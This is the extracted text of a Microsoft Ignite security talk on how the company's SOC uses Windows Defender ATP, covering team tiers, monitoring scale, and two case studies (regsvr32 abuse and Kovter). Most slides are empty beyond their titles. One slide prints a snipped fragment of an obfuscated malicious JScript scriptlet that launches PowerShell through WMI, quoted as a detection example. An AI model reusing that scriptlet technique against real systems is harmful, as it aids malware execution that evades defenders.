Download presentation
Presentation is loading. Please wait.
Published byTiffany Hill Modified over 6 years ago
1
How Microsoft uses Windows Defender ATP–Welcome to a SecOps world!
5/27/2018 3:50 PM BRK2060 How Microsoft uses Windows Defender ATP–Welcome to a SecOps world! Brian Hooper Senior Security Analyst Microsoft | Digital Security & Risk Engineering © Microsoft Corporation. All rights reserved. MICROSOFT MAKES NO WARRANTIES, EXPRESS, IMPLIED OR STATUTORY, AS TO THE INFORMATION IN THIS PRESENTATION.
2
DSRE Security Monitoring | where we fit.
5/27/2018 3:50 PM DSRE Security Monitoring | where we fit. Cyber Defense Operations Center Cyber Security Services Engineering Digital Crimes Unit Digital Security & Risk Engineering Microsoft Azure (C+E Security) Microsoft Security Response Center (C+E Security) Microsoft Threat Intelligence Center (MSTIC) Office 365 Windows & Devices Group © Microsoft Corporation. All rights reserved. MICROSOFT MAKES NO WARRANTIES, EXPRESS, IMPLIED OR STATUTORY, AS TO THE INFORMATION IN THIS PRESENTATION.
3
DSRE Security Monitoring | how we are structured.
5/27/2018 3:50 PM DSRE Security Monitoring | how we are structured. SOC Structure SOC Data Sources TIER 1 24x7 Automated alerting (SIEM) Human alerting (User reporting) Proactive mitigation Remediation & Tracking Host Network FW++ IDS++ TIER 2 20x5 + On-call Tier 1 Escalations; L2 Analysis Automated alerting (SIEM) Windows Defender ATP Rapid Investigations Consoles TIER 3 16x5 + On-call Tier 2 Escalations; L3 Analysis Root Cause Analysis of Major Incidents Hunting, Alert Tuning, & PG Feedback Workflow Automation Operationalize the Threat SIEM Big Data (Queries & Analytics) SOC Engineering SIEM content + Ops/Maintenance (O&M) Network FW, IDS content + O&M SOC Design Monitoring Use Cases © Microsoft Corporation. All rights reserved. MICROSOFT MAKES NO WARRANTIES, EXPRESS, IMPLIED OR STATUTORY, AS TO THE INFORMATION IN THIS PRESENTATION.
4
DSRE Security Monitoring | why endpoint monitoring is hard.
5/27/2018 3:50 PM DSRE Security Monitoring | why endpoint monitoring is hard. Massive Scale 250K+ active users 300K+ active mailboxes 500K+ active workstations [not including mobile devices] Forward-leaning in OS > even more data per device Cloud First Highly Mobile Boundary shifts Device usage shifts BYOAnything © Microsoft Corporation. All rights reserved. MICROSOFT MAKES NO WARRANTIES, EXPRESS, IMPLIED OR STATUTORY, AS TO THE INFORMATION IN THIS PRESENTATION.
5
DSRE Security Monitoring | how Defender ATP helps.
5/27/2018 3:50 PM DSRE Security Monitoring | how Defender ATP helps. Management Monitoring DEPLOY AND MANAGE Built-in agent, low effort onboarding, no on-prem infrastructure CONNECTIVITY An always-on service for our always connected devices SCALE We have data from all 500K systems and it grows as we grow PRECISION Intelligent, actionable alerts fueled by Microsoft security experts SPEED Rapid host triage and deep event timeline for investigations EFFICIENCY Enables focused response and enterprise containment © Microsoft Corporation. All rights reserved. MICROSOFT MAKES NO WARRANTIES, EXPRESS, IMPLIED OR STATUTORY, AS TO THE INFORMATION IN THIS PRESENTATION.
6
Case Study 1: regsvr32.exe 5/27/2018 3:50 PM
© Microsoft Corporation. All rights reserved. MICROSOFT MAKES NO WARRANTIES, EXPRESS, IMPLIED OR STATUTORY, AS TO THE INFORMATION IN THIS PRESENTATION.
7
DSRE Security Monitoring | Case Study 1
5/27/2018 3:50 PM DSRE Security Monitoring | Case Study 1 © Microsoft Corporation. All rights reserved. MICROSOFT MAKES NO WARRANTIES, EXPRESS, IMPLIED OR STATUTORY, AS TO THE INFORMATION IN THIS PRESENTATION.
8
DSRE Security Monitoring | Case Study 1 (cont.)
5/27/2018 3:50 PM DSRE Security Monitoring | Case Study 1 (cont.) © Microsoft Corporation. All rights reserved. MICROSOFT MAKES NO WARRANTIES, EXPRESS, IMPLIED OR STATUTORY, AS TO THE INFORMATION IN THIS PRESENTATION.
9
DSRE Security Monitoring | Case Study 1 (cont.)
5/27/2018 3:50 PM DSRE Security Monitoring | Case Study 1 (cont.) © Microsoft Corporation. All rights reserved. MICROSOFT MAKES NO WARRANTIES, EXPRESS, IMPLIED OR STATUTORY, AS TO THE INFORMATION IN THIS PRESENTATION.
10
DSRE Security Monitoring | Case Study 1 (cont.)
5/27/2018 3:50 PM DSRE Security Monitoring | Case Study 1 (cont.) © Microsoft Corporation. All rights reserved. MICROSOFT MAKES NO WARRANTIES, EXPRESS, IMPLIED OR STATUTORY, AS TO THE INFORMATION IN THIS PRESENTATION.
11
DSRE Security Monitoring | Case Study 1 (cont.)
5/27/2018 3:50 PM DSRE Security Monitoring | Case Study 1 (cont.) © Microsoft Corporation. All rights reserved. MICROSOFT MAKES NO WARRANTIES, EXPRESS, IMPLIED OR STATUTORY, AS TO THE INFORMATION IN THIS PRESENTATION.
12
DSRE Security Monitoring | Case Study 1 (cont.)
5/27/2018 3:50 PM DSRE Security Monitoring | Case Study 1 (cont.) From the article: Our alert: From: © Microsoft Corporation. All rights reserved. MICROSOFT MAKES NO WARRANTIES, EXPRESS, IMPLIED OR STATUTORY, AS TO THE INFORMATION IN THIS PRESENTATION.
13
DSRE Security Monitoring | Case Study 1 (cont.)
5/27/2018 3:50 PM DSRE Security Monitoring | Case Study 1 (cont.) From: © Microsoft Corporation. All rights reserved. MICROSOFT MAKES NO WARRANTIES, EXPRESS, IMPLIED OR STATUTORY, AS TO THE INFORMATION IN THIS PRESENTATION.
14
DSRE Security Monitoring | Case Study 1 (cont.)
5/27/2018 3:50 PM DSRE Security Monitoring | Case Study 1 (cont.) From: © Microsoft Corporation. All rights reserved. MICROSOFT MAKES NO WARRANTIES, EXPRESS, IMPLIED OR STATUTORY, AS TO THE INFORMATION IN THIS PRESENTATION.
15
DSRE Security Monitoring | Case Study 1 (cont.)
5/27/2018 3:50 PM DSRE Security Monitoring | Case Study 1 (cont.) From: © Microsoft Corporation. All rights reserved. MICROSOFT MAKES NO WARRANTIES, EXPRESS, IMPLIED OR STATUTORY, AS TO THE INFORMATION IN THIS PRESENTATION.
16
DSRE Security Monitoring | Case Study 1 (cont.)
5/27/2018 3:50 PM DSRE Security Monitoring | Case Study 1 (cont.) XML version="1.0" <scriptlet> <registration progid="CLASS" classid=" F F1ED1CDC <script language="JScript"> [CDATA[ <SNIP> wshel=new ActiveXObject(_0xd5bd('0x1b')) fso=new ActiveXObject(_0xd5bd('0x1c')) if(is_ps_installed() is_dotnet_installed()) wmi_create_process(pspath _0xd5bd('0x1d') '\x2f\x70\x31\x27\x29\x29',showexec) catch(_0x5babc9) </script> </registration> </scriptlet> From: © Microsoft Corporation. All rights reserved. MICROSOFT MAKES NO WARRANTIES, EXPRESS, IMPLIED OR STATUTORY, AS TO THE INFORMATION IN THIS PRESENTATION.
17
Case Study 2: Kovter 5/27/2018 3:50 PM
© Microsoft Corporation. All rights reserved. MICROSOFT MAKES NO WARRANTIES, EXPRESS, IMPLIED OR STATUTORY, AS TO THE INFORMATION IN THIS PRESENTATION.
18
DSRE Security Monitoring | Case Study 2
5/27/2018 3:50 PM DSRE Security Monitoring | Case Study 2 © Microsoft Corporation. All rights reserved. MICROSOFT MAKES NO WARRANTIES, EXPRESS, IMPLIED OR STATUTORY, AS TO THE INFORMATION IN THIS PRESENTATION.
19
DSRE Security Monitoring | Case Study 2 (cont.)
5/27/2018 3:50 PM DSRE Security Monitoring | Case Study 2 (cont.) © Microsoft Corporation. All rights reserved. MICROSOFT MAKES NO WARRANTIES, EXPRESS, IMPLIED OR STATUTORY, AS TO THE INFORMATION IN THIS PRESENTATION.
20
DSRE Security Monitoring | Case Study 2 (cont.)
5/27/2018 3:50 PM DSRE Security Monitoring | Case Study 2 (cont.) © Microsoft Corporation. All rights reserved. MICROSOFT MAKES NO WARRANTIES, EXPRESS, IMPLIED OR STATUTORY, AS TO THE INFORMATION IN THIS PRESENTATION.
21
DSRE Security Monitoring | Case Study 2 (cont.)
5/27/2018 3:50 PM DSRE Security Monitoring | Case Study 2 (cont.) © Microsoft Corporation. All rights reserved. MICROSOFT MAKES NO WARRANTIES, EXPRESS, IMPLIED OR STATUTORY, AS TO THE INFORMATION IN THIS PRESENTATION.
22
DSRE Security Monitoring | Case Study 2 (cont.)
5/27/2018 3:50 PM DSRE Security Monitoring | Case Study 2 (cont.) © Microsoft Corporation. All rights reserved. MICROSOFT MAKES NO WARRANTIES, EXPRESS, IMPLIED OR STATUTORY, AS TO THE INFORMATION IN THIS PRESENTATION.
23
DSRE Security Monitoring | Case Study 2 (cont.)
5/27/2018 3:50 PM DSRE Security Monitoring | Case Study 2 (cont.) © Microsoft Corporation. All rights reserved. MICROSOFT MAKES NO WARRANTIES, EXPRESS, IMPLIED OR STATUTORY, AS TO THE INFORMATION IN THIS PRESENTATION.
24
DSRE Security Monitoring | Case Study 2 (cont.)
5/27/2018 3:50 PM DSRE Security Monitoring | Case Study 2 (cont.) © Microsoft Corporation. All rights reserved. MICROSOFT MAKES NO WARRANTIES, EXPRESS, IMPLIED OR STATUTORY, AS TO THE INFORMATION IN THIS PRESENTATION.
25
5/27/2018 3:50 PM Questions? © Microsoft Corporation. All rights reserved. MICROSOFT MAKES NO WARRANTIES, EXPRESS, IMPLIED OR STATUTORY, AS TO THE INFORMATION IN THIS PRESENTATION.
26
Please evaluate this session
Tech Ready 15 5/27/2018 Please evaluate this session From your Please expand notes window at bottom of slide and read. Then Delete this text box. PC or tablet: visit MyIgnite Phone: download and use the Microsoft Ignite mobile app Your input is important! © 2012 Microsoft Corporation. All rights reserved. Microsoft, Windows, Windows Vista and other product names are or may be registered trademarks and/or trademarks in the U.S. and/or other countries. The information herein is for informational purposes only and represents the current view of Microsoft Corporation as of the date of this presentation. Because Microsoft must respond to changing market conditions, it should not be interpreted to be a commitment on the part of Microsoft, and Microsoft cannot guarantee the accuracy of any information provided after the date of this presentation. MICROSOFT MAKES NO WARRANTIES, EXPRESS, IMPLIED OR STATUTORY, AS TO THE INFORMATION IN THIS PRESENTATION.
27
5/27/2018 3:50 PM © Microsoft Corporation. All rights reserved. MICROSOFT MAKES NO WARRANTIES, EXPRESS, IMPLIED OR STATUTORY, AS TO THE INFORMATION IN THIS PRESENTATION.
Similar presentations
© 2024 SlidePlayer.com. Inc.
All rights reserved.